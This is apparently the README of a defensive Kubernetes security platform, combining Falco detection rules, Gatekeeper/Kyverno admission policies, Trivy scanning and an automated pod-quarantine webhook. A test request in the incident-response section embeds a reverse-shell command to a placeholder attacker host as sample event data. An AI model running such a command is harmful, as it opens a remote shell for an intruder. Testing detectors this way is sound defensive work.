effiekarinea/k8s-security-platform

GitHub: effiekarinea/k8s-security-platform

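A production-grade defense-in-depth security platform for Kubernetes clusters. It combines Falco runtime detection, OPA/Kyverno admission control, continuous Trivy vulnerability scanning, and automated isolation and forensic response, covering the full lifecycle from pre-deployment policy enforcement to post-deployment threat handling.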


# Kubernetes Security Platform

[![Falco](https://img.shields.io/badge/Runtime_Security-Falco_0.37-00AEF3?logo=falco)](https://falco.org/) [![OPA](https://img.shields.io/badge/Admission_Control-OPA_Gatekeeper-4B5EC2?logo=openpolicyagent)](https://open-policy-agent.github.io/gatekeeper/) [![Kyverno](https://img.shields.io/badge/Policy_Engine-Kyverno-0059A1)](https://kyverno.io/) [![Trivy](https://img.shields.io/badge/Vulnerability_Scan-Trivy_Operator-1904DA)](https://trivy.dev/) [![MITRE](https://img.shields.io/badge/Framework-MITRE_ATT%26CK-red)](https://attack.mitre.org/matrices/enterprise/containers/) [![CIS](https://img.shields.io/badge/Benchmark-CIS_Kubernetes_1.8-blue)](https://www.cisecurity.org/benchmark/kubernetes)

A production-grade Kubernetes runtime security platform for EKS. It implements defense in depth across four areas: admission control, runtime threat detection, continuous vulnerability scanning, and automated incident response. Its controls are mapped to MITRE ATT&CK for Containers, CIS Kubernetes Benchmark 1.8, NIST 800-53, and PCI DSS.

## Security Architecture

Most container security focuses on the CI/CD pipeline, where images are scanned before they are deployed. This platform covers what happens **after** deployment: it detects threats at runtime, enforces policy at admission, continuously scans running workloads, and responds to incidents automatically.

```
┌─────────────────────────────────────────────────────────────────────┐
│                       DEFENSE IN DEPTH LAYERS                       │
│                                                                     │
│  Layer 1: ADMISSION CONTROL (prevent bad configs entering cluster)  │
│  ┌────────────────────────┐  ┌───────────────────────────────────┐  │
│  │ OPA Gatekeeper         │  │ Kyverno                           │  │
│  │ - No privileged pods   │  │ - Verify Cosign signatures        │  │
│  │ - Approved registries  │  │ - Disallow :latest tag            │  │
│  │ - Required labels      │  │ - Drop ALL capabilities           │  │
│  │ - Resource limits      │  │ - Require seccomp profile         │  │
│  │ - Non-root required    │  │ - Auto-generate NetworkPolicies   │  │
│  └────────────────────────┘  └───────────────────────────────────┘  │
│                                                                     │
│  Layer 2: RUNTIME DETECTION (detect threats in running containers)  │
│  ┌───────────────────────────────────────────────────────────────┐  │
│  │ Falco (eBPF-based, every node via DaemonSet)                  │  │
│  │ - Crypto mining processes             MITRE T1496             │  │
│  │ - Reverse shell attempts              MITRE T1059             │  │
│  │ - Container privilege escalation      MITRE T1611             │  │
│  │ - Sensitive file access               MITRE T1552             │  │
│  │ - Package manager execution           MITRE T1190             │  │
│  │ - Network scanning tools              MITRE T1046             │  │
│  │ - kubectl exec detection              MITRE T1609             │  │
│  │ - K8s API anomalies (anonymous access, secret reads)          │  │
│  └───────────────────────────────────────────────────────────────┘  │
│                                                                     │
│  Layer 3: CONTINUOUS SCANNING (catch new CVEs post-deployment)      │
│  ┌───────────────────────────────────────────────────────────────┐  │
│  │ Trivy Operator (scans all running workloads continuously)     │  │
│  │ - VulnerabilityReport per workload                            │  │
│  │ - ConfigAuditReport (K8s misconfigurations)                   │  │
│  │ - ExposedSecretReport (secrets in images)                     │  │
│  │ - RbacAssessmentReport                                        │  │
│  │ - Prometheus metrics → alerts on new CRITICAL CVEs            │  │
│  └───────────────────────────────────────────────────────────────┘  │
│                                                                     │
│  Layer 4: AUTOMATED RESPONSE (contain threats faster than humans)   │
│  ┌───────────────────────────────────────────────────────────────┐  │
│  │ Falco → Falco Sidekick → auto-response.py webhook             │  │
│  │ - Label pod as quarantined                                    │  │
│  │ - Apply network isolation (deny all ingress/egress)           │  │
│  │ - Capture forensic snapshot → S3                              │  │
│  │ - Alert Slack + PagerDuty with full context                   │  │
│  │ - Optionally delete pod (restart from clean image)            │  │
│  └───────────────────────────────────────────────────────────────┘  │
│                                                                     │
│  Layer 5: AUDIT & COMPLIANCE                                        │
│  ┌───────────────────────────────────────────────────────────────┐  │
│  │ Kubernetes Audit Policy + RBAC Hardening                      │  │
│  │ - Captures secret access, exec, privilege escalation          │  │
│  │ - Least-privilege roles: security-auditor, developer,         │  │
│  │   cicd-deployer, incident-responder                           │  │
│  │ - Prometheus alerts on RBAC anomalies                         │  │
│  └───────────────────────────────────────────────────────────────┘  │
└─────────────────────────────────────────────────────────────────────┘
```

## Compliance Coverage

| Control | CIS K8s 1.8 | NIST 800-53 | PCI DSS | MITRE ATT&CK |
|---|---|---|---|---|
| No privileged containers | 5.2.1 | AC-6 | 2.2 | T1611 |
| Non-root containers | 5.2.6 | AC-6 | 2.2 | T1548 |
| Read-only root filesystem | 5.2.8 | CM-7 | 2.2 | T1070 |
| Drop all capabilities | 5.2.9 | AC-6 | 2.2 | T1548 |
| Approved image registries only | - | CM-7 | 6.3 | T1525 |
| Required labels | - | CM-8 | - | - |
| Network policies | 5.3.2 | SC-7 | 1.3 | T1046 |
| Crypto mining detection | - | SI-4 | 11.4 | T1496 |
| Shell spawn detection | - | SI-4 | 11.4 | T1059 |
| Secret access auditing | 3.2.1 | AU-2 | 10.2 | T1552 |
| Privilege escalation detection | - | AU-2 | 10.2 | T1611 |
| Least-privilege RBAC | 5.1.1 | AC-6 | 7.1 | - |
| Audit logging | 3.2.1 | AU-2 | 10.2 | - |
| Continuous CVE scanning | - | SI-2 | 6.3 | - |
| Image signature verification | - | CM-14 | 6.3 | T1525 |

## Repository Structure

```
k8s-security-platform/
+-- README.md
+-- falco/
|   +-- rules/enterprise-rules.yaml           # 15 custom MITRE-mapped detection rules
|   +-- config/falco-values.yaml              # Falco + Sidekick Helm config
+-- gatekeeper/
|   +-- constraint-templates/templates.yaml   # 7 Rego policy templates
|   +-- constraints/constraints.yaml          # Constraint instances + exemptions
+-- kyverno/
|   +-- policies/policies.yaml                # Cosign verification, capabilities, seccomp
+-- trivy-operator/
|   +-- values.yaml                           # Continuous CVE scanning config
+-- rbac/
|   +-- rbac.yaml                             # Least-privilege roles + bindings
+-- audit/
|   +-- audit-policy.yaml                     # K8s audit policy (API server)
+-- alerting/
|   +-- prometheus/security-alerts.yaml       # Prometheus security alert rules
+-- scripts/
|   +-- bootstrap.sh                          # One-command cluster security setup
|   +-- auto-response.py                      # Automated incident response webhook
```

## Quick Start

### Install everything with one command

```
./scripts/bootstrap.sh \
  --cluster-name my-eks-cluster \
  --region us-east-1 \
  --slack-webhook https://hooks.slack.com/services/xxx/yyy/zzz
```

### Or install each component separately

```
# Add the Helm chart repositories used below
helm repo add gatekeeper https://open-policy-agent.github.io/gatekeeper/charts
helm repo add kyverno https://kyverno.github.io/kyverno/
helm repo add falcosecurity https://falcosecurity.github.io/charts
helm repo add aqua https://aquasecurity.github.io/helm-charts/
helm repo update

# OPA Gatekeeper
helm upgrade --install gatekeeper gatekeeper/gatekeeper \
  -n gatekeeper-system --create-namespace \
  --set replicas=3 --wait
kubectl apply -f gatekeeper/constraint-templates/templates.yaml
sleep 15  # Wait for Gatekeeper to create the constraint CRDs from the templates
kubectl apply -f gatekeeper/constraints/constraints.yaml

# Kyverno
helm upgrade --install kyverno kyverno/kyverno \
  -n kyverno --create-namespace --wait
kubectl apply -f kyverno/policies/policies.yaml

# Falco
helm upgrade --install falco falcosecurity/falco \
  -n falco --create-namespace \
  --values falco/config/falco-values.yaml --wait

# Trivy Operator
helm upgrade --install trivy-operator aqua/trivy-operator \
  -n trivy-system --create-namespace \
  --values trivy-operator/values.yaml --wait

# RBAC + Prometheus security alert rules
# (audit/audit-policy.yaml is kube-apiserver configuration and is not applied with kubectl)
kubectl apply -f rbac/rbac.yaml
kubectl apply -f alerting/prometheus/security-alerts.yaml
```

## Verifying the Platform

### Check that Gatekeeper is enforcing policies

```
# Try to deploy a privileged pod (it should be rejected)
kubectl run privileged-test \
  --image=nginx \
  --overrides='{"spec":{"containers":[{"name":"nginx","image":"nginx","securityContext":{"privileged":true}}]}}'
# Expected: Error from server: admission webhook denied the request

# Check all constraints
kubectl get constraints
kubectl describe k8snoprivilegedcontainer no-privileged-containers
```

### Trigger a Falco rule for testing

```
# Spawn a shell in a container (triggers the "Shell Spawned in Container" rule)
kubectl run test-pod --image=ubuntu --restart=Never --command -- sleep 3600
kubectl exec test-pod -- /bin/bash -c "echo test"

# View Falco events
kubectl logs -n falco -l app.kubernetes.io/name=falco -c falco --tail=20 -f
```

### Check Trivy vulnerability reports

```
# List all vulnerability reports
kubectl get vulnerabilityreports -A

# Get details for a specific workload
kubectl describe vulnerabilityreport <report-name> -n devsecops-prod

# Find all CRITICAL CVEs in the cluster
kubectl get vulnerabilityreports -A -o json | \
  jq '.items[] | select(.report.summary.criticalCount > 0) | {namespace: .metadata.namespace, name: .metadata.name, critical: .report.summary.criticalCount}'
```

## Falco Rule Reference

| Rule | MITRE Tactic | MITRE Technique | Priority |
|---|---|---|---|
| Crypto Mining Process Detected | Impact | T1496 | CRITICAL |
| Reverse Shell Attempt | Execution | T1059 | CRITICAL |
| Exec into Running Container | Execution | T1609 | CRITICAL |
| Privileged Pod Created | Privilege Escalation | T1611 | CRITICAL |
| Anonymous Access to K8s API | Initial Access | T1190 | CRITICAL |
| Container Privilege Escalation | Privilege Escalation | T1611 | HIGH |
| Sensitive File Access | Credential Access | T1552 | HIGH |
| Shell Spawned in Container | Execution | T1059 | HIGH |
| Network Scanning Tool Detected | Discovery | T1046 | HIGH |
| Log File Deletion | Defense Evasion | T1070 | HIGH |
| Setuid/Setgid Bit Set | Privilege Escalation | T1548 | HIGH |
| K8s Secret Accessed by Unexpected User | Credential Access | T1552 | HIGH |
| Service Account Token Read | Credential Access | T1552 | MEDIUM |
| Package Manager Executed | Execution | T1190 | MEDIUM |

## Automated Incident Response

When Falco detects a CRITICAL event, the response webhook will:

1. **Label the pod** with `security.enterprise.com/quarantined: true`
   - This makes the compromise visible in `kubectl get pods` (for example, with `-l security.enterprise.com/quarantined=true`)
   - Adding a label does not by itself remove the pod from Service endpoints; that only happens when the Service selector stops matching. The isolation NetworkPolicy in step 2 is what cuts off traffic
2. **Apply an isolation NetworkPolicy** that denies all ingress and egress traffic for the pod
3. **Capture a forensic snapshot** containing the full Pod spec, the last 500 log lines, and the Kubernetes events, and save it to S3 with KMS encryption
4. **Send an alert to Slack + PagerDuty** with full context (pod, image, command, namespace)
5. **(Optional) Delete the pod** (set `AUTO_DELETE_PODS=true`). If the pod is managed by a controller such as a Deployment, Kubernetes recreates it from the clean image

```
# Run the response webhook locally for testing
export SLACK_TOKEN=xoxb-...
export S3_FORENSICS_BUCKET=my-forensics-bucket
python3 scripts/auto-response.py --server --port 9090

# Test with a sample event
curl -X POST http://localhost:9090/falco \
  -H "Content-Type: application/json" \
  -d '{"rule":"Reverse Shell Attempt","priority":"CRITICAL","output_fields":{"k8s.pod.name":"test-pod","k8s.ns.name":"default","container.image.repository":"nginx","proc.cmdline":"bash -i >& /dev/tcp/evil.com/4444 0>&1"}}'
```

## Operations Runbooks

### Investigating a Falco CRITICAL alert

```
# 1. Find the quarantined pods
kubectl get pods -A -l security.enterprise.com/quarantined=true

# 2. Get the quarantine reason
kubectl get pod <pod-name> -n <namespace> \
  -o jsonpath='{.metadata.annotations}'

# 3. Retrieve the forensic logs from S3
aws s3 ls s3://forensics-bucket/falco-events/ --recursive
aws s3 cp s3://forensics-bucket/falco-events///.json /tmp/forensics.json
jq . /tmp/forensics.json

# 4. After the investigation, remove the isolation and delete the pod
kubectl delete networkpolicy quarantine- -n <namespace>
kubectl delete pod <pod-name> -n <namespace>
```

### Check OPA policy violations in the cluster

```
kubectl get constraintpodstatuses -A
kubectl describe k8sallowedrepos approved-registries-only
```

### View Trivy reports for a namespace

```
kubectl get vulnerabilityreports -n <namespace> -o wide
kubectl get configauditreports -n <namespace> -o wide
```

## License

MIT